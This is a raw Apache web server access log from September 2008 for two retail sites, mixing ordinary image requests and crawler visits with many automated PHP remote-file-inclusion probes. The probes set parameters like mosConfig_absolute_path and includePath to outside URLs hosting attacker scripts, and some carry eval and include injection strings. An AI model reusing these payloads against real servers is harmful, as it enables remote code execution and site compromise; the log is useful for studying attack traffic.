64.12.117.138 - - [09/Sep/2008:01:12:46 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.7 - - [09/Sep/2008:01:12:46 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.206 - - [09/Sep/2008:01:12:46 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.78 - - [09/Sep/2008:01:12:47 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.65 - - [09/Sep/2008:01:12:47 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.133 - - [09/Sep/2008:01:12:49 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.70 - - [09/Sep/2008:01:12:49 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.112.202 - - [09/Sep/2008:01:12:49 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.20 - - [09/Sep/2008:01:12:49 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.137 - - [09/Sep/2008:01:12:50 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.116.7 - - [09/Sep/2008:01:12:50 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.207 - - [09/Sep/2008:01:12:50 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.206 - - [09/Sep/2008:01:12:50 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.66 - - [09/Sep/2008:01:12:50 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.117.20 - - [09/Sep/2008:01:12:50 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.12.112.202 - - [09/Sep/2008:01:12:56 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
141.89.66.2 - - [09/Sep/2008:01:13:22 -0400] "GET /logs/error_log.Q108022600/work.php?includePath=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:01:13:23 -0400] "GET /logs/error_log.Q108060600/work.php?includePath=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:01:13:25 -0400] "GET /logs/work.php?includePath=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
65.111.166.193 - - [09/Sep/2008:01:13:26 -0400] "GET //main.php?appserv_root=http://smba.jinju.ac.kr/ismael.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
141.89.66.2 - - [09/Sep/2008:01:13:27 -0400] "GET /logs/work.php?includePath=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:01:13:27 -0400] "GET /work.php?includePath=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
141.89.66.2 - - [09/Sep/2008:01:13:28 -0400] "GET /logs/error_log.Q108060600/work.php?includePath=http://www.tabernus.com/downloads/response.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
80.91.118.150 - - [09/Sep/2008:01:14:17 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
80.91.118.150 - - [09/Sep/2008:01:14:17 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
209.59.12.99 - - [09/Sep/2008:01:14:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.189.135.22 - - [09/Sep/2008:01:14:34 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
193.189.135.22 - - [09/Sep/2008:01:14:34 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.54.29.66 - - [09/Sep/2008:01:14:36 -0400] "GET /logs/access_log.Q108081300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
198.65.23.238 - - [09/Sep/2008:01:14:54 -0400] "GET /logs/access_log.Q108081300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET[a]),exit.'&a=http://www.propowerfit.com/articledirectory/jepang.gl?? HTTP/1.0" 404 235 "-" "libwww-perl/5.53"
200.93.147.155 - - [09/Sep/2008:01:15:55 -0400] "GET /logs/access_log.Q108061400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:15:56 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:15:56 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:16:10 -0400] "GET /logs/error_log.Q108061400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
62.94.199.120 - - [09/Sep/2008:01:16:26 -0400] "GET /logs/error_log.Q108082500/protection.php?action=logout&siteurl=http://www.sunter.us/a.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
62.94.199.120 - - [09/Sep/2008:01:16:29 -0400] "GET /logs/protection.php?action=logout&siteurl=http://www.sunter.us/a.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
66.249.67.114 - - [09/Sep/2008:01:14:26 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.183 - - [09/Sep/2008:01:18:30 -0400] "GET /logs/error_log.Q107081100 HTTP/1.0" 200 14944 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [09/Sep/2008:01:19:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.90.77.32 - - [09/Sep/2008:01:19:38 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.trosken.com/echo? HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
209.90.77.32 - - [09/Sep/2008:01:19:38 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.trosken.com/echo? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
209.90.77.32 - - [09/Sep/2008:01:19:39 -0400] "GET /logs/error_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.trosken.com/echo? HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
88.84.139.156 - - [09/Sep/2008:01:21:10 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
88.84.139.156 - - [09/Sep/2008:01:21:10 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.135.142.207 - - [09/Sep/2008:01:22:24 -0400] "GET //?custompluginfile[]=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:22:26 -0400] "GET /logs//?custompluginfile[]=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 200 24064 "-" "libwww-perl/5.805"
195.11.67.10 - - [09/Sep/2008:01:22:07 -0400] "GET /logs/error_log.Q108060100 HTTP/1.1" 200 332994 "-" "uumvkounqijknjneohoxemkpur1 vbinpbqokd"
66.249.67.114 - - [09/Sep/2008:01:20:48 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [09/Sep/2008:01:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.126.46.141 - - [09/Sep/2008:01:26:18 -0400] "GET /logs/error_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.grinchradio.com/diegar/did.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
62.94.199.120 - - [09/Sep/2008:01:26:45 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.sunter.us/a.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
66.249.67.114 - - [09/Sep/2008:01:27:21 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.155 - - [09/Sep/2008:01:27:47 -0400] "GET /logs/error_log.Q108082300/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:27:48 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:27:49 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
58.27.152.45 - - [09/Sep/2008:01:29:07 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
58.27.152.45 - - [09/Sep/2008:01:29:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
58.27.152.45 - - [09/Sep/2008:01:29:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
58.27.152.45 - - [09/Sep/2008:01:29:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
209.59.12.99 - - [09/Sep/2008:01:29:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.114 - - [09/Sep/2008:01:27:22 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.36.166.240 - - [09/Sep/2008:01:31:06 -0400] "GET /logs/error_log.Q108090200/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
65.36.166.240 - - [09/Sep/2008:01:31:07 -0400] "GET /logs/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
65.36.166.240 - - [09/Sep/2008:01:31:07 -0400] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
65.36.166.240 - - [09/Sep/2008:01:31:34 -0400] "GET /logs/error_log.Q108082600/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
69.73.129.100 - - [09/Sep/2008:01:31:57 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
69.73.129.100 - - [09/Sep/2008:01:32:02 -0400] "GET //index.php?DOCUMENT_ROOT=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
69.73.129.100 - - [09/Sep/2008:01:32:02 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
69.73.129.100 - - [09/Sep/2008:01:32:06 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
81.176.226.180 - - [09/Sep/2008:01:32:07 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:07 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:08 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:11 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:12 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:12 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:14 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
81.176.226.180 - - [09/Sep/2008:01:32:15 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:32:50 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:32:53 -0400] "GET //index.php?DOCUMENT_ROOT=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:32:53 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:33:06 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [09/Sep/2008:01:34:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.155 - - [09/Sep/2008:01:34:54 -0400] "GET /logs/error_log.Q108082000/errors.php?error=http://www.geocities.com/linasuci/new.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.91.224.4 - - [09/Sep/2008:01:34:58 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
121.135.142.207 - - [09/Sep/2008:01:35:01 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:35:02 -0400] "GET ///vwar/backup/errors.php?error=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:35:09 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:35:13 -0400] "GET /logs/access_log.Q108080300///vwar/backup/errors.php?error=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
74.54.29.66 - - [09/Sep/2008:01:35:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
200.93.147.155 - - [09/Sep/2008:01:35:37 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:35:39 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:35:40 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:35:52 -0400] "GET /logs/error_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
66.249.67.114 - - [09/Sep/2008:01:33:25 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.47.129.79 - - [09/Sep/2008:01:36:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:36:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:37:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:37:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
71.106.169.134 - - [09/Sep/2008:01:37:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
71.106.169.134 - - [09/Sep/2008:01:37:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
71.106.169.134 - - [09/Sep/2008:01:37:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
71.106.169.134 - - [09/Sep/2008:01:37:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
200.93.147.155 - - [09/Sep/2008:01:38:54 -0400] "GET /logs/access_log.Q108052000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:38:55 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:38:56 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
